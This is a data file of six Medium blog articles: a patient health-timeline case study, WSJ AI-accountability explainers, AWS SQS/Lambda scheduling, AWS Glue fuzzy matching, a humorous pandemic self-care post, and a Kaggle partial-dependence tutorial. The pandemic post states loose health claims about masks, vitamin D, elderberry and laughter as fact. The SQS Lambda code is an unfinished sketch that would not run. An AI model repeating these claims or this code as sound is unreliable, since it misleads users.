title
stringlengths
1
200
text
stringlengths
10
100k
url
stringlengths
32
885
authors
stringlengths
2
392
timestamp
stringlengths
19
32
tags
stringlengths
6
263
It’s Complicated
It’s Complicated Visualizing complex health histories & symptoms for two patients with rare and mystery conditions I recently worked with a smart, well-spoken patient, E., to put together a visual summary of her health. Unlike many others I’ve worked with, she was not looking for answers or a new diagnosis; she was motivated because she was starting the application process for a new service dog, and she needed to demonstrate her physical constraints and daily needs. She also had a complex medical history, with multiple chronic conditions, injuries, surgeries and procedures, and she wanted to see everything in one place for the first time. I went through my standard process of gathering her information, talking through her story with her, and creating visuals to represent the conversation. I then created a detailed timeline and symptom map, with an emphasis on her two longstanding conditions, Cryoglobulinemia and Ehlers-Danlos Syndrome (EDS). Both of these conditions are considered ‘rare diseases’ — meaning each one affects fewer than 200,000 Americans at any given time. A quick aside with some definitions: Cryoglobulinemia is the presence of abnormal proteins in the blood, and symptoms often include skin lesions and purple spots, joint pain, peripheral neuropathy (in other words burning or tingling in hands and feet), and more. EDS is a connective tissue disorder “generally characterized by joint hypermobility (joints that stretch further than normal), skin hyperextensibility (skin that can be stretched further than normal), and tissue fragility” (source: Ehlers-Danlos Society website). In addition to these two key diagnoses, E. also had Dysautonomia, an issue with her autonomic nervous system that causes fast heart rate, lightheadedness on standing, inability to regulate sweating, and more. All together, these three conditions caused E. a whole host of symptoms and injuries, many stretching back to her childhood. She’d had six broken ankles between age 10 and 15; at one point both of her ankles were broken at the same time. She estimated she’d had close to 50 surgeries since 1985. It was a lot to look back on, and it made for a very full timeline, as you can see below (most words and dates removed for privacy).
https://medium.com/pictal-health/its-complicated-60b2cb9c2398
['Katie Mccurdy']
2019-03-13 12:40:04.849000+00:00
['Design', 'Healthcare', 'Patient Experience', 'Health', 'Data Visualization']
What is the Role of Journalists in Holding Artificial Intelligence Accountable?
What is the Role of Journalists in Holding Artificial Intelligence Accountable? The Wall Street Journal is experimenting with a new approach for reporting how smart algorithms work, beyond simply describing them. Image Credit: Gabriel Gianordoli/ WSJ Journalists, who routinely ask questions of their sources, should also be asking questions about an algorithm’s methodology. The rules created for algorithms need to be explicit and understood. The Wall Street Journal has been experimenting with a new approach to explain how AI works by letting readers experiment with it. “Interactive graphics can provide insights into how algorithms work in a way beyond simply describing its output. They can do this by acting as safe spaces in which readers can experiment with different inputs and immediately see how the computer might respond to it,” said deputy graphics director Elliot Bentley. “To make this accessible and non-intimidating, it’s important to design a straightforward interface with minimal controls, and also provide informative and immediate feedback,” Bentley added. Image Credit: Gabriel Gianordoli/ WSJ The most recent example of letting readers experiment with algorithms is our story, “What Your Writing Says About You,”published as part of the Leadership issue of Journal Reports. The news experience offers an interface allowing people to enter text such as an essay, cover letter, blog post or business email and receive results from algorithms that rate the content by different parameters. By including detailed methodology and source notes, we allow our audiences to understand how machine learning and natural language processing can determine context, language mastery, meaning and even your mood from the choice of words. “These explorable explainers allow us to not only go deeper, but also to give the readers a perspective on subjects like AI that we can’t give them by simply writing more great stories. It immerses them in a unique way in a subject we know they care about,” said Journal Reports editor Larry Rout. In a previous Graphics project entitled “How Facial Recognition Software Works,” Bentley explained that readers need only to enable their webcam and begin moving their head around in order to play with a facial-recognition algorithm. It then provides clear, real-time feedback using a series of visual overlays. Another example of this is “Build Your Own Trading Bot” in which we attempted to demystify algorithmic trading by designing a user-friendly interface and a rewarding feedback loop to encourage readers to experiment with the mechanics. How Facial Recognition Software Works. Credit: Elliot Bentley/WSJ Journalism and algorithmic accountability We might not notice it, but artificial intelligence affects multiple parts of our lives. These algorithms decide whether an individual qualifies for a loan, whether a resume is seen by a recruiter, which seat a passenger is assigned on an airplane, which advertisements shoppers see online and what information on the internet is shown to users. Transparency of the data that feeds these processes is crucial both for consumers to better understand what they encounter and for organizations to shape their business strategy. Given the challenging nature of auditing algorithms, it’s important to consider how the practice of journalism can be leveraged to hold AI systems accountable. In his forthcoming book, Northwestern University professor of computational journalism Nicholas Diakopoulos introduces the notion of algorithmic accountability reporting as an approach to highlight influences that computer programs exercise in society. “Operating at scale and often affecting large groups of people, algorithms make consequential and sometimes contestable decisions in an increasing range of domains throughout the public and private sectors. In response, a distinct beat in journalism is emerging to investigate the societal power exerted through such algorithms. There are various newsworthy angles on algorithms including discrimination and unfairness, errors and mistakes, social and legal norm violations, and human misuse. Reverse engineering and auditing techniques can be used to elucidate the contours of algorithmic power,” Diakopoulos explained. The “black box” problem in AI When certain decisions are derived through an algorithm, it’s often hard to pinpoint why or how an automatic output was derived. This introduces the problem of the “black box” algorithm whereby correlations are made without rules set by humans. This term is often used as a metaphor for algorithms in which the process to reach a certain outcome cannot be seen in full. “Auditing algorithms is not for the faint of heart. Information deficits, expectation setting, limited legal access, and shifting dynamic targets can all hamper an investigation. Working in teams, methods specialists working with domain experts can, however, overcome these obstacles and publish important stories about algorithms in society,” Diakopoulos added. It’s indeed relevant to dissect how computers make decisions and to comprehend how smart systems are created. For example, the AI powering the set of analysis in “What Your Writing Says About You” is provided by Factbase, an AI company which makes its algorithms open source, peer reviewed, and available for examination. In “What Your Writing Says about You,” we explain the underlying scientific methodology behind each output, including the Flesch-Kincaid Grade Level — developed in 1975 by the Department of Defense to review readability level of military materials — as well as the Treebank methodology created by the University of Pennsylvania to evaluate linguistic structure of text. “It’s important, as much as is possible, to understand the parameters under which the AI or algorithms arrived at its conclusions. What parameters it examines, and how it analyzes it, provides transparency to its thinking, per se, which in turn makes it more clear how it decides what it decides,” said Bill Frischling, founder of FactBase. This issue is prevalent in artificial intelligence, partly because the systems are not necessarily designed to explain how they do certain things, but to just do them. This is also a byproduct of algorithms learning by themselves; they make causal links not based on human instruction but on self-identified patterns. Newsroom collaboration The Wall Street Journal’s news hub in New York City. There are, of course, technical gaps to developing this type of reporting on algorithms, which can be addressed by working cross-functionally with data scientists, computational journalists and technologists. Increasingly, it’s important to foster a culture of collaboration throughout the newsroom and bring multiple perspectives into the process of story planning and development. “A project such as this which taps so many areas of expertise and aligns them is a pleasure to be part of. What started with WSJ Lab’s original outline of possibilities was honed by a team of editors at Journal Reports to focus on specifically what our writing reveals about us. Our interactives team wrangled the code, user interface and graphic visualization,” said news editor Demetria Gallegos. “Then, privacy experts from our legal and data teams, our social and off-platform colleagues and homepage and mobile editors weighed in to ensure the experience is optimized for every reader,” Gallegos added. The odds for a successful collaboration can be increased if the organization is able to foster an environment where journalists are encouraged to test new ideas, to seek feedback, and to share best practices even if experiments are unsuccessful. Building this “feedback loop” can enable news professionals to mitigate the uncertainty of experimentation as well as inform the broader newsroom strategy. “When we are thinking about how to create an innovative news experience, we have to consider how readers already ingest news — and how much further they are willing to go. In our discussions during the story planning process, we ran through various scenarios of how the tool could work, based on different criteria. We then ruled out things that would require too much time or too many steps. We also had to be sensitive to how much information people are willing to disclose. We designed this interactive story to be fun enough to get readers in, engaging enough to have them read through it, take the quiz, play the game etc. And if they end up sharing their results on social media, we know we did it right,” explained news editor Cristina Lourosa. Journalistic standards and technological evolution Just because a certain result came from a computer, it doesn’t mean it’s right. Artificial intelligence is programmed by humans and consequently it can make mistakes. The ethical considerations inherent to using AI are far and wide. “Understanding the source of information whether it’s from a person or algorithm is not only crucial for the news industry but as well, for democracy,” said Kourosh Houshmand, a computational journalist at Columbia Journalism School. The practice of journalism is about questioning the world around us, and that same principle still applies even when a piece of software played a role in a particular outcome such as determining the price of a product, evaluating how a person feels based on their writing or selecting a candidate for a job interview. “We can help readers understand how technology works by explaining how the algorithms get their results and then pointing to the source documents and formulas that power the calculations,” said graphics reporter Nigel Chiwaya. An effective way to understand AI is to experiment with it, comprehend the nuances of how algorithms make decisions and how those decisions may affect our lives.
https://medium.com/the-wall-street-journal/what-is-the-role-of-journalists-in-holding-artificial-intelligence-accountable-9a6321e5a265
['Francesco Marconi']
2020-04-20 08:43:10.910000+00:00
['Algorithms', 'Artificial Intelligence', 'Journalism', 'Best Practices', 'Ethics']
Scheduling tasks with AWS SQS and Lambda
Scheduling tasks with AWS SQS and Lambda Engineering@ZenOfAI Follow Feb 16 · 4 min read In this story, we will be learning a workaround for how to schedule or delay a message using AWS SQS despite its 15 minutes (900 seconds) upper limit. First let us understand some SQS attributes briefly. Firstly lets look at Delivery Delay. It lets you specify a delay between 0 and 900 seconds ( 15 minutes). When set, any message sent to the queue will only become visible to consumers after the configured delay period. Secondly Visibility Timeout, the time that a received message from a queue will be invisible to be received again unless it’s deleted from the queue. If you want to learn about dead letter queue and deduplication, you could follow my other article: Processing High Volume Big Data Concurrently with No Duplicates using AWS SQS. So, when a consumer receives a message, the message remains in the queue but is invisible for the duration of its visibility timeout, after which other consumers will be able to see the message. Ideally, the first consumer would handle and delete the message before the visibility timeout expires. The upper limit for visibility timeout is 12 hours. We could leverage this to schedule/delay a task. A typical combination would be SQS with Lambda where the invoked function executes the task. Usually, standard queues when enabled with lambda triggers have immediate consumption that means when a message is inserted into the standard queue the lambda function is invoked immediately with the message available in the event object. Note: If the lambda results in an error the message stays in the queue for further receive requests, otherwise it is deleted. That said, there could be 2 cases: A generic setup that can adapt to a range of time delays. A stand-alone setup built to handle only a fixed time delay. The idea is to insert a message into the queue with task details and time to execute(target time) and have the lambda do the dirty work. Case1: The Lambda function checks if target time equals current time, if so execute the task and message is deleted as the lambda executes without error else change the visibility timeout of that message in the queue with delta difference and raise an error leaving the message in the queue. Case2: The SQS’s default visibility timeout is configured with the required fixed time delay. The Lambda function checks if the difference of target time and current time equals fixed time delay, if so execute the task and message is deleted as the lambda executes without error else simply raise an error leaving the message untampered back in the queue. The message is retried after it’s visibility timeout which is the required fixed time delay and is executed. The problem with this approach is accuracy and scalability. Here’s the lambda code for case2: Processor.py import boto3 import json from datetime import datetime, timezone import dateutil.tz tz = dateutil.tz.gettz('US/Central') fixed_time_delay = 1 # change this value, be it hour, min, sec def lambda_handler(event, context): # TODO implement message = event['Records'][0] # print(message) result = json.loads(message['body']) task_details = result['task_details'] target_time = result['execute_at'] tt = datetime.strptime(target_time, "%d/%m/%Y, %H:%M %p CST") print(tt) t_now = datetime.now(tz) time_now = t_now.strftime("%d/%m/%Y, %H:%M %p CST") tn = datetime.strptime(time_now, "%d/%m/%Y, %H:%M %p CST") print(tn) delta_time = tn-tt print(delta_time) delta_in_whatever = #extract delay in hour, min, sec if delta_in_whatever == fixed_time_delay: # execute task logic print(task_details) else: raise e Conclusion: Scheduling tasks using SQS isn’t effective in all scenarios. You could use AWS step function’s wait state to achieve milliseconds accuracy, or Dynamo DB’s TTL feature to build an ad hoc scheduling mechanism, the choice of service used is largely dependent on the requirement. So, here’s a wonderful blog post that gives you a bigger picture of different ways to schedule a task on AWS. This story is authored by Koushik. Koushik is a software engineer specializing in AWS Cloud Services.
https://medium.com/zenofai/scheduling-tasks-with-aws-sqs-and-lambda-82bdcfbc0fd8
['Engineering Zenofai']
2020-02-20 14:14:17.090000+00:00
['Software Development', 'AWS Lambda', 'AWS', 'Cloud Computing']
Machine Learning based Fuzzy Matching using AWS Glue ML Transforms
Machine Learning Transforms in AWS Glue AWS Glue provides machine learning capabilities to create custom transforms to do Machine Learning based fuzzy matching to deduplicate and cleanse your data. For this we are going to use a transform named FindMatches. The FindMatches transform enables you to identify duplicate or matching records in your dataset, even when the records do not have a common unique identifier and no fields match exactly. This will not require writing any code or knowing how machine learning works. For more details about ML Transforms, please go through the docs. Creating a Machine Learning Transform with AWS Glue This article walks you through the actions to create and manage a machine learning (ML) transform using AWS Glue. I assume that you are familiar with using the AWS Glue console to add crawlers and jobs and edit scripts. You should also be familiar with finding and downloading files on the Amazon Simple Storage Service (Amazon S3) console. In case you are just starting out on AWS Glue, I have explained how to create an AWS Glue Crawler and Glue Job from scratch in one of my earlier articles. The source data used in this blog is a hypothetical file named customers_data.csv. A second file, label_file.csv, is an example of a labeling file that contains both matching and nonmatching records used to teach the transform. Step 1: Crawl the Data using AWS Glue Crawler At the outset, crawl the source data from the CSV file in S3 to create a metadata table in the AWS Glue Data Catalog. I created a crawler pointing to the source location (s3://bucketname/data/ml-transform/customers/). In case you are just starting out on the AWS Glue crawler, I have explained how to create one from scratch in one of my earlier articles. If you run this crawler, it creates a customers table in the specified database (ml-transform). Step 2: Add a Machine Learning Transform Next, add a machine learning transform that is based on the schema of your data source table created by the above crawler. Choose Worker type and Maximum capacity as per the requirements. 3. For Data source, choose the table that was created in the earlier step. In this, the table named customers in database ml-transform. 4. For Primary key, choose the primary key column for the table, email. Step 3: How to Teach Your Machine Learning Transform Next, teach the machine learning transform using the sample labeling file. You can’t use a machine language transform in an extract, transform, and load (ETL) job until its status is Ready for use. To get your transform ready, you must teach it how to identify matching and non-matching records by providing examples of matching and non-matching records. To teach your transform, you can Generate a label file, add labels, and then Upload label file. For this article, the label file I have used is label_file.csv On the AWS Glue console, in the navigation pane, choose ML Transforms. Choose the earlier created transform, and then choose Action, Teach. If you don’t have the label file, choose I do not have labels, you can Generate a label file, add labels, and then Upload label file. If you have the label file, choose I have labels, then choose Upload labelling file from S3. Choose an Amazon S3 path to the sample labeling file in the current AWS Region. (s3://bucketname/data/ml-transform/labels/label_file.csv) with the option to overwrite existing labels. The labeling file must be located in S3 in the same Region as the AWS Glue console. When you upload a labeling file, a task is started in AWS Glue to add or overwrite the labels used to teach the transform how to process the data source. Step 4: Estimate the Quality of ML Transform What is Labeling? The act of labeling is creating a labeling file (such as in a spreadsheet) and adding identifiers, or labels, into the label column that identifies matching and non-matching records. It is important to have a clear and consistent definition of a match in your source data. AWS Glue learns from which records you designate as matches (or not) and uses your decisions to learn how to find duplicate records. Next, you can estimate the quality of your machine learning transform. The quality depends on how much labeling you have done. On the AWS Glue console, in the navigation pane, choose ML Transforms . . Choose the earlier created transform, and choose the Estimate quality tab. This tab displays the current quality estimates, if available, for the transform. Choose Estimate quality to start a task to estimate the quality of the transform. The accuracy of the quality estimate is based on the labeling of the source data. to start a task to estimate the quality of the transform. The accuracy of the quality estimate is based on the labeling of the source data. Navigate to the History tab. In this pane, task runs are listed for the transform, including the Estimating quality task. For more details about the run, choose Logs. Check that the run status is Succeeded when it finishes. Step 5: Create and run a Job with ML Transform In this step, we use your machine learning transform to add and run a job in AWS Glue. When the transform is Ready for use, we can use it in an ETL job. On the AWS Glue console, in the navigation pane, choose Jobs. Choose Add job. In case you are just starting out on AWS Glue ETL Job, I have explained how to create one from scratch in one of my earlier articles. For Name , choose the example job in this tutorial, ml-transform . , choose the example job in this tutorial, . Choose an IAM role that has permission to access Amazon S3 and AWS Glue API operations. that has permission to access Amazon S3 and AWS Glue API operations. For ETL language , choose Spark 2.2, Python 2. Machine learning transforms are currently not supported for Spark 2.4. , choose Spark 2.2, Python 2. Machine learning transforms are currently not supported for Spark 2.4. For Data source , choose the table created in Step 1 . The data source you choose must match the machine learning transform data source schema. , choose the table created in . The data source you choose must match the machine learning transform data source schema. For Transform type, choose to Find matching records to create a job using a machine learning transform. For Transform , choose transform created in step 2, the machine learning transform used by the job. , choose transform created in step 2, the machine learning transform used by the job. For Create tables in your data target, choose to create tables with the following properties. Data store type — Amazon S3 Format — CSV Compression type — None Target path — The Amazon S3 path where the output of the job is written (in the current console AWS Region) Choose Save job and edit script to display the script editor page. The script looks like the following. After you edit the script, choose Save. import sys from awsglue.transforms import * from awsglue.utils import getResolvedOptions from pyspark.context import SparkContext from awsglue.context import GlueContext from awsglue.job import Job from awsglueml.transforms import FindMatches args = getResolvedOptions(sys.argv, ['JOB_NAME']) ## @params : [JOB_NAME]args = getResolvedOptions(sys.argv, ['JOB_NAME']) glueContext = GlueContext(sc) spark = glueContext.spark_session job = Job(glueContext) job.init(args['JOB_NAME'], args) ## ## ## ## datasource0 = glueContext.create_dynamic_frame.from_catalog(database = "ml_transforms", table_name = "customers", transformation_ctx = "datasource0") ## ## ## ## resolvechoice1 = ResolveChoice.apply(frame = datasource0, choice = "MATCH_CATALOG", database = "ml_transforms", table_name = "customers", transformation_ctx = "resolvechoice1") ## ## ## ## findmatches2 = FindMatches.apply(frame = resolvechoice1, transformId = "eacb9a1ffbc686f61387f63", transformation_ctx = "findmatches2") ## ## ## ## datasink3 = glueContext.write_dynamic_frame.from_options(frame = findmatches2, connection_type = "s3", connection_options = {"path": "s3:/<bucket-name>/data/ml-transforms/output/"}, format = "csv", transformation_ctx = "datasink3") job.commit() sc = SparkContext()glueContext = GlueContext(sc)spark = glueContext.spark_sessionjob = Job(glueContext)job.init(args['JOB_NAME'], args)## @type : DataSource## @args : [database = "ml_transforms", table_name = "customers", transformation_ctx = "datasource0"]## @return : datasource0## @inputs : []datasource0 = glueContext.create_dynamic_frame.from_catalog(database = "ml_transforms", table_name = "customers", transformation_ctx = "datasource0")## @type : ResolveChoice## @args : [choice = "MATCH_CATALOG", database = "ml_transforms", table_name = "customers", transformation_ctx = "resolvechoice1"]## @return : resolvechoice1## @inputs : [frame = datasource0]resolvechoice1 = ResolveChoice.apply(frame = datasource0, choice = "MATCH_CATALOG", database = "ml_transforms", table_name = "customers", transformation_ctx = "resolvechoice1")## @type : FindMatches## @args : [transformId = "eacb9a1ffbc686f61387f63", emitFusion = false, survivorComparisonField = " ", transformation_ctx = "findmatches2"]## @return : findmatches2## @inputs : [frame = resolvechoice1]findmatches2 = FindMatches.apply(frame = resolvechoice1, transformId = "eacb9a1ffbc686f61387f63", transformation_ctx = "findmatches2")## @type : DataSink## @args : [connection_type = "s3", connection_options = {"path": "s3://bucket-name/data/ml-transforms/output/"}, format = "csv", transformation_ctx = "datasink3"]## @return : datasink3## @inputs : [frame = findmatches2]datasink3 = glueContext.write_dynamic_frame.from_options(frame = findmatches2, connection_type = "s3", connection_options = {"path": "s3:/ /data/ml-transforms/output/"}, format = "csv", transformation_ctx = "datasink3")job.commit() Choose Run job to start the job run. Check the status of the job in the jobs list. When the job finishes, in the ML transform, History tab, there is a new Run ID row added of type ETL job. Navigate to the Jobs, History tab. In this pane, job runs are listed. For more details about the run, choose Logs. Check that the run status is Succeeded when it finishes. Step 6: Verify Output Data from Amazon S3 in Amazon Athena In this step, check the output of the job run in the Amazon S3 bucket that you chose when you added the job. You can create a table in the Glue Data catalog pointing to the output location, just like the way we crawled the source data in Step 1. You can then query the data in Athena. However, the Find matches transform adds another column named match_id to identify matching records in the output. Rows with the same match_id are considered matching records. If you don’t find any matches, you can continue to teach the transform by adding more labels. Thanks for the read and look forward to your comments This story is authored by PV Subbareddy. Subbareddy is a Big Data Engineer specializing on AWS Big Data Services and Apache Spark Ecosystem.
https://medium.com/zenofai/machine-learning-based-fuzzy-matching-using-aws-glue-ml-transforms-761ad208bdbe
['Engineering Zenofai']
2019-11-21 09:46:35.064000+00:00
['Cloud Computing', 'Machine Learning', 'Spark', 'AWS', 'Software Development']
Do These Things To Survive The Rest of The Pandemic
Do These Things To Survive The Rest of The Pandemic Upgrade your mask. Eat healthy. Sleep. Laugh. You could say round one of the pandemic is over. We didn’t do very well. Plus, round two has already started. The good news is that science has a plan for us. I’m not a scientist, but I listen to science. I got an A in AP biology and a B+ in chemistry, which already makes me more qualified than most of our politicians. Smart people have been taking this thing very seriously. We always do our homework. So here’s a list of practical things you can do to actually make it through this winter: Upgrade your mask. The health experts say the point of wearing a mask is to protect other people. Unfortunately, there’s a lot of idiots out there who think it’s a terrible assault on their personal freedom. So you’re going to have to level up your facegear. Everyone in the world is selling masks right now. Kylie Jenner probably has one. Hold on. Let me check. Yep. She’s got one. Take a look: Kylie Jenner’s face mask. (Not recommended.) Wow. That looks safe… Try this instead: Get a nanofiber mask. You need a mask that filters down to .3 microns. These are called N95 filters. Earlier this year they were hard to come by, and you’d probably go to hell for buying them, because that would’ve meant depriving hospitals of PPE. Good news, a lot’s changed since then. A few months ago, startup companies like Filti started making high quality masks and replaceable filters with nanofiber materials. They’re not medical grade, but they’re lab tested. There’s also HALO Mask, which makes the same kinds of products, using nanofiber manufactured in New Zealand. I did my homework. They’re both legit. (And they’re not paying me anything to plug them. They barely know I exist.) This means you can go run errands without freaking out whenever some covidiot crosses your path without a mask. Same goes if you can’t work from home. Your mask actually protects you. How much? A helluva lot more than your standard generic face mask at most stores. I’ll take it. You’re skeptical. That’s cool. Researching masks turned into a summer project. I spent weeks digging through articles and websites. Finally, a reliable newspaper published this piece explaining how mask filtration works. Basically: Yes, the coronavirus is smaller than .3 microns. (.1 micron, to be exact.) But that doesn’t mean anything by itself, for two reasons: Viruses always attach to larger particles. Nobody inhales free-floating virus. They inhale droplets, which are always 1.0 micron or bigger. You’re filtering the droplets with virus attached to them, not the naked virus particles themselves. Masks with .3 micron filtration can capture particles smaller than that because of a phenomenon called “Brownian motion.” That means very small particles move in a jagged zig-zag pattern, which increases the chances they’ll get snagged. So you’ve got a plan for a decent mask. Now what? Start taking Vitamin D You should be taking a multivitamin. On top of that, the experts are starting to learn that if you’re topped off on Vitamin D, you probably have a lesser risk of dying from the coronavirus. Hey, you might as well try. You can take a supplement. You can drink milk and orange juice. You can eat salmon. You can make sure you spend half an hour outside. Yes, every day. No, you can’t just sit by your window and read. I’m lazy. I checked. Glass blocks the specific spectrum of light your body needs. Start eating your veggies. Your immune system likes healthy food. Dark greens: Kale. Spinach. Broccoli. Asparagus. Plus onions and tomatoes. Even my 2-year-old eats kale now. I mix up a bunch of vegetables and kale in a giant batch and pour balsamic and lemon juice all over it. Add some pepper and feta cheese, and some olive oil. I can eat that all day. Start making elderberry syrup. Some studies show it helps reduce the duration and severity of the flu and other viruses. Buying elderberry syrup in a bottle is expensive. So you can make your own. Just buy some elderberries in bulk. You can find all kinds of recipes for syrup online. Stop drinking so much. You’re going to need your liver. Alcohol is bad for it, and basically everything else in your body. New studies have killed that cozy idea that drinking in moderation might improve your health. Basically, the downsides of boozing far outweigh the benefits. Alcohol might lower the risk of heart disease, but it increases the risk of cancer and liver disease. I know. This sucks. We’ve all been using health as an excuse to justify drinking a helluva lot more than usual this year. You’re gonna have to reel it in. You get to drink once a week now, if that. And you get to have one or two drinks maximum. It’s almost, like, not even worth it. Did you know the number one reason people drink is boredom? So I guess you’ll need to find a hobby. Let’s move on to your mental and emotional health. Learn to be okay with a mess. For the first six months, I was all about chores. They relaxed me. Seeing a perfectly clean sink brought me peace. Folding laundry calmed me down. Then something changed. Work got busy again. My toddler developed advanced mess-making skills. Keeping the house clean morphed into a set of expectations I was placing on myself. I sacrificed sleep to keep everything tidy. This had to stop. Upon reflection, I figured out what I was doing. I was stress cleaning. Chores were a way for me to feel like I had control. Learn how to do nothing. The answer to stress cleaning was learning to let go of control, as in literally just stop my brain and do nothing for ten or fifteen minutes. It was easier than I thought. I was ready for a break. I just had to give myself one. Now I’m cured. A handful of dirty dishes in the sink doesn’t stress me out anymore. I can’t afford to let it. Doing nothing is the most relaxing thing in the world right now. It beats just about everything else. Stop trying to relax. Relaxing is overrated now. In the pandemic era, it doesn’t work. I finally realized that everything I was trying to do to “chill out” was just overstimulating or triggering me. After a while, my favorite shows just made me think too much about the future, or too much about the past. So just do nothing. Or… Stop your revenge bedtime procrastination. We already weren’t getting enough sleep before the pandemic. Part of the problem is that we convince ourselves to stay up too late. We do that because we’re trying to steal back a part of our day. The Japanese call this, “Revenge bedtime procrastination.” They have the best names for everything. Sleep is more important than ever. So when you’re tired, do what Samuel L. Jackson says. Just go the f*ck to sleep, man. It’s almost winter. You’re a mammal. Your body wants to hibernate. Let it. That doesn’t mean sleeping the next six months in a cave. But it does mean going to bed when you feel tired, regardless of what time it is. I’ve been going down around 10 pm some nights, about two or three hours early for my taste. But it’s giving me a lot more energy. I wake up at 5 or 6 am, ready to go. Finally become a morning person. If you’re stuck in quarantine with family, then super early mornings are basically the only way you can work in peace now. Back in June, I could work under distraction and disruption. Sometimes I still can. But making that the norm was wearing me out. So if I actually want to be productive, I’ll wake up at 4 am and work for a few hours before the kid arises. It helps. It makes the rest of the day more relaxing. Stop trying to not talk about the news. You know what happens when you try to not talk about the news? You think about it. Then you talk about it anyway. Then you feel guilty. What a vicious cycle. If you want to gleefully speculate about when Trump’s going to have a relapse, then just do it. Get it out of your system. Remember to laugh. Take the world seriously. But not that seriously. We were all freaking out about the first presidential debate. The top Google search the next day was “move to New Zealand.” Then Jim Carey and Alec Baldwin saved us. They reminded us how comically absurd that entire debate was. Don’t forget to laugh. It provides perspective. It also boosts your immune system. So watch comedy. Tell jokes. Be sarcastic. Find happiness where you can. It surprises me how often I’m actually happy when I follow all this advice. It almost feels like the world isn’t falling apart. I feel prepared for worst case scenarios. I’m not scared of the bottom anymore. I know what we’ll be doing for the next six months, and I know what’s going to happen. Now it’s just a matter of getting through it. So upgrade your mask. Take your vitamins. Eat your veggies. Cool it with the alcohol. Go to sleep when you’re tired. Stop stress cleaning your house. Remind yourself how to just do nothing. Stop trying so hard to not be in a pandemic. Just be in it. Don’t forget to laugh.
https://medium.com/the-haven/do-these-things-to-survive-the-rest-of-the-pandemic-f66e0245a9f5
['Jessica Wildfire']
2020-10-09 04:59:22.849000+00:00
['Mindfulness', 'Humor', 'Health', 'Culture', 'Society']
Tackling Kaggle’s Mercedes-Benz Greener Manufacturing Competition with Python
Photo by Markus Spiske on Unsplash Introduction In this part, we’ll perform exploratory data analysis (EDA) on our data, which is a crucial part of most machine learning problems. Although we might not end up increasing our score, we will draw invaluable insights from our data, which is often one of the primary objectives of real-world machine learning. We are going to use some of the traditional EDA techniques, but we’ll also touch on a few underused ones as well. You can find the notebook for this tutorial here. Without further ado, let’s get coding (in Colab)! Ceteris Paribus From the previous article, we have a vague idea of what partial dependence is, the problem it tries to solve, and how it does so. However, quite a few of the details were left out, so this article will be devoted to filling those empty spots. First, let’s talk about what ‘with all other things being equal’ means. Suppose we have a smaller version of our dataset, which could look something like this: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | a | 99 | | 0 | 1 | 0 | b | 97 | | 1 | 1 | 1 | c | 102 | | 1 | 0 | 0 | a | 97.5 | | 0 | 0 | 0 | b | 96.5 | | 1 | 0 | 1 | c | 102.9 | +------+------+------+----+-------+ And we’d like to know how the dependent variable reacts to different values of ‘X5’. In order to do so, we must modify our dataset so that all variables but ‘X5’ remain the same. How would we do that? Well, it’s as simple as replacing all instances of ‘X5’ with the class we’d like to know the average test time of. So we’d have 3 (number of classes in ‘X5’) different versions of our dataset and in each one, ‘X5’ is a constant: Dataset A: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | a | 99 | | 0 | 1 | 0 | a | 97 | | 1 | 1 | 1 | a | 102 | | 1 | 0 | 0 | a | 97.5 | | 0 | 0 | 0 | a | 96.5 | | 1 | 0 | 1 | a | 102.9 | +------+------+------+----+-------+ Dataset B: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | b | 99 | | 0 | 1 | 0 | b | 97 | | 1 | 1 | 1 | b | 102 | | 1 | 0 | 0 | b | 97.5 | | 0 | 0 | 0 | b | 96.5 | | 1 | 0 | 1 | b | 102.9 | +------+------+------+----+-------+ Dataset C: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | c | 99 | | 0 | 1 | 0 | c | 97 | | 1 | 1 | 1 | c | 102 | | 1 | 0 | 0 | c | 97.5 | | 0 | 0 | 0 | c | 96.5 | | 1 | 0 | 1 | c | 102.9 | +------+------+------+----+-------+ There are now 3 variations of our dataset, where the only difference between them is ‘X5’ (that is, all other things are equal). All that’s left is simply taking the average of the dependent values of each of the datasets above. But there’s obviously a huge problem we face: The dependent values are for the original dataset, not the modified ones. For example, in the first row, ‘y’ = 99 is the test time for ‘X5’ = ‘a’, not ‘b’ or ‘c’. Thus, we need a way to find the dependent value for a row not present in our dataset. Fortunately, we have the tools to do exactly that. A “Partial” Solution In part 2 of this series, we built a slightly tuned Random Forest and guess what it can do? Estimate the test time of a vehicle, which is just what we need. We can simply use our model to predict the dependent values of datasets A, B, and C (the y-values shown here are most likely not consistent and make no sense at all. But that’s besides the point): Dataset A: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | a | 100 | | 0 | 1 | 0 | a | 98 | | 1 | 1 | 1 | a | 105 | | 1 | 0 | 0 | a | 97 | | 0 | 0 | 0 | a | 95 | | 1 | 0 | 1 | a | 102.9 | +------+------+------+----+-------+ Dataset B: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | b | 90 | | 0 | 1 | 0 | b | 99 | | 1 | 1 | 1 | b | 105 | | 1 | 0 | 0 | b | 97 | | 0 | 0 | 0 | b | 96 | | 1 | 0 | 1 | b | 102 | +------+------+------+----+-------+ Dataset C: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | c | 90 | | 0 | 1 | 0 | c | 105 | | 1 | 1 | 1 | c | 100 | | 1 | 0 | 0 | c | 97.1 | | 0 | 0 | 0 | c | 96.5 | | 1 | 0 | 1 | c | 102.1 | +------+------+------+----+-------+ Now we can take the average of the dependent values to get a reasonably close estimate for the average test time of vehicles with a specific ‘X5’. This method, like any other, has its own disadvantages: For starters, it’s only as good as our model. Therefore, if our model’s not very accurate, the results we get aren’t very reliable and might even be worse than taking the average of the original y-values. Another issue that arises with the use of partial dependence is that not all categories are compatible. For instance, let’s go back to the example of ‘X5’ and how its value can correspond to the level of climate consciousness of the owner. And we’ll also add a made-up column, called ‘X1000’, that includes 26 categories (‘a’, ‘b’, …, ‘z’) , relating to the type of AC used in a car. Now, assume ‘a’ is a type of AC which is cheap but comes at the expense of being inefficient relative to the amount of gas used and therefore damaging to the climate. But on the other end of the alphabet, we have ‘z’, a costly but 